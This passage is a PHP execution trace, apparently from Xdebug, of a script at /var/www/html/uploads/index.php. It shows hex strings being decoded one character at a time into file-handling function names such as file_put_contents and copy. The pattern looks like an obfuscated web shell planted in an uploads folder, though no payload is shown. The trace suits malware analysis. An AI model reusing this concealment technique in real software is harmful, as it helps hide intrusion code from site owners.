3	124	0	0.005517	583288	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	124	1	0.005529	583336
3	124	R			105
3	125	0	0.005541	583256	chr	0		/var/www/html/uploads/index.php	178	1	105
3	125	1	0.005553	583296
3	125	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	126	0	0.005584	583320	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	126	1	0.005595	583368
3	126	R			115
3	127	0	0.005607	583288	chr	0		/var/www/html/uploads/index.php	178	1	115
3	127	1	0.005619	583328
3	127	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	128	0	0.005649	583320	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	128	1	0.005661	583368
3	128	R			95
3	129	0	0.005673	583288	chr	0		/var/www/html/uploads/index.php	178	1	95
3	129	1	0.005685	583328
3	129	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	130	0	0.005715	583320	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	130	1	0.005727	583368
3	130	R			102
3	131	0	0.005739	583288	chr	0		/var/www/html/uploads/index.php	178	1	102
3	131	1	0.005750	583328
3	131	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	132	0	0.005780	583320	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	132	1	0.005792	583368
3	132	R			105
3	133	0	0.005804	583288	chr	0		/var/www/html/uploads/index.php	178	1	105
3	133	1	0.005815	583328
3	133	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	134	0	0.005845	583320	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	134	1	0.005857	583368
3	134	R			108
3	135	0	0.005870	583288	chr	0		/var/www/html/uploads/index.php	178	1	108
3	135	1	0.005881	583328
3	135	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	136	0	0.005911	583320	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	136	1	0.005922	583368
3	136	R			101
3	137	0	0.005935	583288	chr	0		/var/www/html/uploads/index.php	178	1	101
3	137	1	0.005946	583328
3	137	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	123	1	0.005977	583288
2	123	R			'is_file'
1		A						/var/www/html/uploads/index.php	8	$func[7] = 'is_file'
1		A						/var/www/html/uploads/index.php	7	$i++
2	138	0	0.006012	583288	dehex	1		/var/www/html/uploads/index.php	8	1	'69735f7772697461626c65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 21
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	139	0	0.006055	583320	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	139	1	0.006067	583368
3	139	R			105
3	140	0	0.006079	583288	chr	0		/var/www/html/uploads/index.php	178	1	105
3	140	1	0.006091	583328
3	140	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	141	0	0.006121	583352	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	141	1	0.006133	583400
3	141	R			115
3	142	0	0.006146	583320	chr	0		/var/www/html/uploads/index.php	178	1	115
3	142	1	0.006157	583360
3	142	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	143	0	0.006192	583352	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	143	1	0.006204	583400
3	143	R			95
3	144	0	0.006216	583320	chr	0		/var/www/html/uploads/index.php	178	1	95
3	144	1	0.006228	583360
3	144	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	145	0	0.006259	583352	hexdec	0		/var/www/html/uploads/index.php	178	1	'77'
3	145	1	0.006270	583400
3	145	R			119
3	146	0	0.006283	583320	chr	0		/var/www/html/uploads/index.php	178	1	119
3	146	1	0.006294	583360
3	146	R			'w'
2		A						/var/www/html/uploads/index.php	178	$r .= 'w'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	147	0	0.006325	583352	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	147	1	0.006336	583400
3	147	R			114
3	148	0	0.006349	583320	chr	0		/var/www/html/uploads/index.php	178	1	114
3	148	1	0.006360	583360
3	148	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	149	0	0.006390	583352	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	149	1	0.006402	583400
3	149	R			105
3	150	0	0.006415	583320	chr	0		/var/www/html/uploads/index.php	178	1	105
3	150	1	0.006426	583360
3	150	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	151	0	0.006456	583352	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	151	1	0.006467	583400
3	151	R			116
3	152	0	0.006480	583320	chr	0		/var/www/html/uploads/index.php	178	1	116
3	152	1	0.006491	583360
3	152	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	153	0	0.006521	583352	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	153	1	0.006533	583400
3	153	R			97
3	154	0	0.006545	583320	chr	0		/var/www/html/uploads/index.php	178	1	97
3	154	1	0.006556	583360
3	154	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	155	0	0.006586	583360	hexdec	0		/var/www/html/uploads/index.php	178	1	'62'
3	155	1	0.006598	583408
3	155	R			98
3	156	0	0.006610	583328	chr	0		/var/www/html/uploads/index.php	178	1	98
3	156	1	0.006622	583368
3	156	R			'b'
2		A						/var/www/html/uploads/index.php	178	$r .= 'b'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	157	0	0.006652	583360	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	157	1	0.006664	583408
3	157	R			108
3	158	0	0.006676	583328	chr	0		/var/www/html/uploads/index.php	178	1	108
3	158	1	0.006687	583368
3	158	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	159	0	0.006717	583360	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	159	1	0.006728	583408
3	159	R			101
3	160	0	0.006741	583328	chr	0		/var/www/html/uploads/index.php	178	1	101
3	160	1	0.006752	583368
3	160	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	138	1	0.006782	583328
2	138	R			'is_writable'
1		A						/var/www/html/uploads/index.php	8	$func[8] = 'is_writable'
1		A						/var/www/html/uploads/index.php	7	$i++
2	161	0	0.006816	583328	dehex	1		/var/www/html/uploads/index.php	8	1	'69735f7265616461626c65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 21
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	162	0	0.006858	583360	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	162	1	0.006870	583408
3	162	R			105
3	163	0	0.006882	583328	chr	0		/var/www/html/uploads/index.php	178	1	105
3	163	1	0.006894	583368
3	163	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	164	0	0.006928	583392	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	164	1	0.006940	583440
3	164	R			115
3	165	0	0.006952	583360	chr	0		/var/www/html/uploads/index.php	178	1	115
3	165	1	0.006964	583400
3	165	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	166	0	0.006994	583392	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	166	1	0.007006	583440
3	166	R			95
3	167	0	0.007019	583360	chr	0		/var/www/html/uploads/index.php	178	1	95
3	167	1	0.007031	583400
3	167	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	168	0	0.007062	583392	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	168	1	0.007074	583440
3	168	R			114
3	169	0	0.007086	583360	chr	0		/var/www/html/uploads/index.php	178	1	114
3	169	1	0.007097	583400
3	169	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	170	0	0.007127	583392	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	170	1	0.007139	583440
3	170	R			101
3	171	0	0.007151	583360	chr	0		/var/www/html/uploads/index.php	178	1	101
3	171	1	0.007163	583400
3	171	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	172	0	0.007193	583392	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	172	1	0.007205	583440
3	172	R			97
3	173	0	0.007217	583360	chr	0		/var/www/html/uploads/index.php	178	1	97
3	173	1	0.007229	583400
3	173	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	174	0	0.007259	583392	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	174	1	0.007271	583440
3	174	R			100
3	175	0	0.007284	583360	chr	0		/var/www/html/uploads/index.php	178	1	100
3	175	1	0.007295	583400
3	175	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	176	0	0.007325	583392	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	176	1	0.007337	583440
3	176	R			97
3	177	0	0.007349	583360	chr	0		/var/www/html/uploads/index.php	178	1	97
3	177	1	0.007361	583400
3	177	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	178	0	0.007390	583400	hexdec	0		/var/www/html/uploads/index.php	178	1	'62'
3	178	1	0.007403	583448
3	178	R			98
3	179	0	0.007414	583368	chr	0		/var/www/html/uploads/index.php	178	1	98
3	179	1	0.007426	583408
3	179	R			'b'
2		A						/var/www/html/uploads/index.php	178	$r .= 'b'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	180	0	0.007456	583400	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	180	1	0.007468	583448
3	180	R			108
3	181	0	0.007480	583368	chr	0		/var/www/html/uploads/index.php	178	1	108
3	181	1	0.007491	583408
3	181	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	182	0	0.007521	583400	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	182	1	0.007533	583448
3	182	R			101
3	183	0	0.007545	583368	chr	0		/var/www/html/uploads/index.php	178	1	101
3	183	1	0.007556	583408
3	183	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	161	1	0.007586	583368
2	161	R			'is_readable'
1		A						/var/www/html/uploads/index.php	8	$func[9] = 'is_readable'
1		A						/var/www/html/uploads/index.php	7	$i++
2	184	0	0.007620	583368	dehex	1		/var/www/html/uploads/index.php	8	1	'66696c6573697a65'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 15
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	185	0	0.007665	583400	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	185	1	0.007677	583448
3	185	R			102
3	186	0	0.007689	583368	chr	0		/var/www/html/uploads/index.php	178	1	102
3	186	1	0.007701	583408
3	186	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	187	0	0.007731	583432	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	187	1	0.007743	583480
3	187	R			105
3	188	0	0.007755	583400	chr	0		/var/www/html/uploads/index.php	178	1	105
3	188	1	0.007766	583440
3	188	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	189	0	0.007796	583432	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	189	1	0.007808	583480
3	189	R			108
3	190	0	0.007820	583400	chr	0		/var/www/html/uploads/index.php	178	1	108
3	190	1	0.007832	583440
3	190	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	191	0	0.007862	583432	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	191	1	0.007874	583480
3	191	R			101
3	192	0	0.007886	583400	chr	0		/var/www/html/uploads/index.php	178	1	101
3	192	1	0.007897	583440
3	192	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	193	0	0.007927	583432	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	193	1	0.007939	583480
3	193	R			115
3	194	0	0.007950	583400	chr	0		/var/www/html/uploads/index.php	178	1	115
3	194	1	0.007962	583440
3	194	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	195	0	0.007992	583432	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	195	1	0.008003	583480
3	195	R			105
3	196	0	0.008015	583400	chr	0		/var/www/html/uploads/index.php	178	1	105
3	196	1	0.008026	583440
3	196	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	197	0	0.008056	583432	hexdec	0		/var/www/html/uploads/index.php	178	1	'7a'
3	197	1	0.008068	583480
3	197	R			122
3	198	0	0.008080	583400	chr	0		/var/www/html/uploads/index.php	178	1	122
3	198	1	0.008092	583440
3	198	R			'z'
2		A						/var/www/html/uploads/index.php	178	$r .= 'z'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	199	0	0.008121	583432	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	199	1	0.008133	583480
3	199	R			101
3	200	0	0.008145	583400	chr	0		/var/www/html/uploads/index.php	178	1	101
3	200	1	0.008156	583440
3	200	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	184	1	0.008186	583408
2	184	R			'filesize'
1		A						/var/www/html/uploads/index.php	8	$func[10] = 'filesize'
1		A						/var/www/html/uploads/index.php	7	$i++
2	201	0	0.008220	583408	dehex	1		/var/www/html/uploads/index.php	8	1	'636f7079'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 7
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	202	0	0.008261	583440	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	202	1	0.008272	583488
3	202	R			99
3	203	0	0.008284	583408	chr	0		/var/www/html/uploads/index.php	178	1	99
3	203	1	0.008296	583448
3	203	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	204	0	0.008327	583472	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	204	1	0.008339	583520
3	204	R			111
3	205	0	0.008352	583440	chr	0		/var/www/html/uploads/index.php	178	1	111
3	205	1	0.008368	583480
3	205	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	206	0	0.008399	583472	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	206	1	0.008411	583520
3	206	R			112
3	207	0	0.008435	583440	chr	0		/var/www/html/uploads/index.php	178	1	112
3	207	1	0.008447	583480
3	207	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	208	0	0.008477	583472	hexdec	0		/var/www/html/uploads/index.php	178	1	'79'
3	208	1	0.008489	583520
3	208	R			121
3	209	0	0.008501	583440	chr	0		/var/www/html/uploads/index.php	178	1	121
3	209	1	0.008512	583480
3	209	R			'y'
2		A						/var/www/html/uploads/index.php	178	$r .= 'y'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	201	1	0.008543	583440
2	201	R			'copy'
1		A						/var/www/html/uploads/index.php	8	$func[11] = 'copy'
1		A						/var/www/html/uploads/index.php	7	$i++
2	210	0	0.008575	583440	dehex	1		/var/www/html/uploads/index.php	8	1	'66696c655f657869737473'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 21
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	211	0	0.008617	583472	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	211	1	0.008629	583520
3	211	R			102
3	212	0	0.008641	583440	chr	0		/var/www/html/uploads/index.php	178	1	102
3	212	1	0.008652	583480
3	212	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	213	0	0.008683	583504	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	213	1	0.008694	583552
3	213	R			105
3	214	0	0.008706	583472	chr	0		/var/www/html/uploads/index.php	178	1	105
3	214	1	0.008718	583512
3	214	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	215	0	0.008747	583504	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	215	1	0.008759	583552
3	215	R			108
3	216	0	0.008771	583472	chr	0		/var/www/html/uploads/index.php	178	1	108
3	216	1	0.008783	583512
3	216	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	217	0	0.008813	583504	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	217	1	0.008824	583552
3	217	R			101
3	218	0	0.008837	583472	chr	0		/var/www/html/uploads/index.php	178	1	101
3	218	1	0.008848	583512
3	218	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	219	0	0.008877	583504	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	219	1	0.008889	583552
3	219	R			95
3	220	0	0.008901	583472	chr	0		/var/www/html/uploads/index.php	178	1	95
3	220	1	0.008913	583512
3	220	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	221	0	0.008943	583504	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	221	1	0.008955	583552
3	221	R			101
3	222	0	0.008967	583472	chr	0		/var/www/html/uploads/index.php	178	1	101
3	222	1	0.008978	583512
3	222	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	223	0	0.009008	583504	hexdec	0		/var/www/html/uploads/index.php	178	1	'78'
3	223	1	0.009019	583552
3	223	R			120
3	224	0	0.009037	583472	chr	0		/var/www/html/uploads/index.php	178	1	120
3	224	1	0.009048	583512
3	224	R			'x'
2		A						/var/www/html/uploads/index.php	178	$r .= 'x'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	225	0	0.009078	583504	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	225	1	0.009090	583552
3	225	R			105
3	226	0	0.009102	583472	chr	0		/var/www/html/uploads/index.php	178	1	105
3	226	1	0.009118	583512
3	226	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	227	0	0.009148	583512	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	227	1	0.009160	583560
3	227	R			115
3	228	0	0.009172	583480	chr	0		/var/www/html/uploads/index.php	178	1	115
3	228	1	0.009183	583520
3	228	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	229	0	0.009228	583512	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	229	1	0.009240	583560
3	229	R			116
3	230	0	0.009252	583480	chr	0		/var/www/html/uploads/index.php	178	1	116
3	230	1	0.009264	583520
3	230	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	231	0	0.009294	583512	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	231	1	0.009305	583560
3	231	R			115
3	232	0	0.009317	583480	chr	0		/var/www/html/uploads/index.php	178	1	115
3	232	1	0.009328	583520
3	232	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	210	1	0.009358	583480
2	210	R			'file_exists'
1		A						/var/www/html/uploads/index.php	8	$func[12] = 'file_exists'
1		A						/var/www/html/uploads/index.php	7	$i++
2	233	0	0.009392	583480	dehex	1		/var/www/html/uploads/index.php	8	1	'66696c655f7075745f636f6e74656e7473'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 33
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	234	0	0.009434	583512	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	234	1	0.009446	583560
3	234	R			102
3	235	0	0.009459	583480	chr	0		/var/www/html/uploads/index.php	178	1	102
3	235	1	0.009470	583520
3	235	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	236	0	0.009501	583544	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	236	1	0.009513	583592
3	236	R			105
3	237	0	0.009525	583512	chr	0		/var/www/html/uploads/index.php	178	1	105
3	237	1	0.009536	583552
3	237	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	238	0	0.009566	583544	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	238	1	0.009578	583592
3	238	R			108
3	239	0	0.009590	583512	chr	0		/var/www/html/uploads/index.php	178	1	108
3	239	1	0.009601	583552
3	239	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	240	0	0.009631	583544	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	240	1	0.009643	583592
3	240	R			101
3	241	0	0.009655	583512	chr	0		/var/www/html/uploads/index.php	178	1	101
3	241	1	0.009667	583552
3	241	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	242	0	0.009697	583544	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	242	1	0.009709	583592
3	242	R			95
3	243	0	0.009721	583512	chr	0		/var/www/html/uploads/index.php	178	1	95
3	243	1	0.009732	583552
3	243	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	244	0	0.009762	583544	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	244	1	0.009774	583592
3	244	R			112
3	245	0	0.009786	583512	chr	0		/var/www/html/uploads/index.php	178	1	112
3	245	1	0.009797	583552
3	245	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	246	0	0.009827	583544	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	246	1	0.009839	583592
3	246	R			117
3	247	0	0.009855	583512	chr	0		/var/www/html/uploads/index.php	178	1	117
3	247	1	0.009867	583552
3	247	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	248	0	0.009897	583544	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	248	1	0.009908	583592
3	248	R			116
3	249	0	0.009920	583512	chr	0		/var/www/html/uploads/index.php	178	1	116
3	249	1	0.009932	583552
3	249	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	250	0	0.009961	583552	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	250	1	0.009973	583600
3	250	R			95
3	251	0	0.009986	583520	chr	0		/var/www/html/uploads/index.php	178	1	95
3	251	1	0.009997	583560
3	251	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	252	0	0.010027	583552	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	252	1	0.010039	583600
3	252	R			99
3	253	0	0.010051	583520	chr	0		/var/www/html/uploads/index.php	178	1	99
3	253	1	0.010062	583560
3	253	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	254	0	0.010092	583552	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	254	1	0.010104	583600
3	254	R			111
3	255	0	0.010116	583520	chr	0		/var/www/html/uploads/index.php	178	1	111
3	255	1	0.010127	583560
3	255	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	256	0	0.010157	583552	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	256	1	0.010169	583600
3	256	R			110
3	257	0	0.010181	583520	chr	0		/var/www/html/uploads/index.php	178	1	110
3	257	1	0.010192	583560
3	257	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	258	0	0.010222	583552	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	258	1	0.010234	583600
3	258	R			116
3	259	0	0.010246	583520	chr	0		/var/www/html/uploads/index.php	178	1	116
3	259	1	0.010257	583560
3	259	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	260	0	0.010286	583552	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	260	1	0.010298	583600
3	260	R			101
3	261	0	0.010310	583520	chr	0		/var/www/html/uploads/index.php	178	1	101
3	261	1	0.010321	583560
3	261	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	262	0	0.010350	583552	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	262	1	0.010362	583600
3	262	R			110
3	263	0	0.010374	583520	chr	0		/var/www/html/uploads/index.php	178	1	110
3	263	1	0.010385	583560
3	263	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	264	0	0.010415	583552	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	264	1	0.010427	583600
3	264	R			116
3	265	0	0.010439	583520	chr	0		/var/www/html/uploads/index.php	178	1	116
3	265	1	0.010450	583560
3	265	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	266	0	0.010479	583560	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	266	1	0.010491	583608
3	266	R			115
3	267	0	0.010503	583528	chr	0		/var/www/html/uploads/index.php	178	1	115
3	267	1	0.010514	583568
3	267	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	233	1	0.010543	583528
2	233	R			'file_put_contents'
1		A						/var/www/html/uploads/index.php	8	$func[13] = 'file_put_contents'
1		A						/var/www/html/uploads/index.php	7	$i++
2	268	0	0.010580	583528	dehex	1		/var/www/html/uploads/index.php	8	1	'66696c655f6765745f636f6e74656e7473'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 33
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	269	0	0.010622	583560	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	269	1	0.010634	583608
3	269	R			102
3	270	0	0.010647	583528	chr	0		/var/www/html/uploads/index.php	178	1	102
3	270	1	0.010658	583568
3	270	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	271	0	0.010689	583592	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	271	1	0.010700	583640
3	271	R			105
3	272	0	0.010713	583560	chr	0		/var/www/html/uploads/index.php	178	1	105
3	272	1	0.010724	583600
3	272	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	273	0	0.010754	583592	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	273	1	0.010766	583640
3	273	R			108
3	274	0	0.010778	583560	chr	0		/var/www/html/uploads/index.php	178	1	108
3	274	1	0.010789	583600
3	274	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
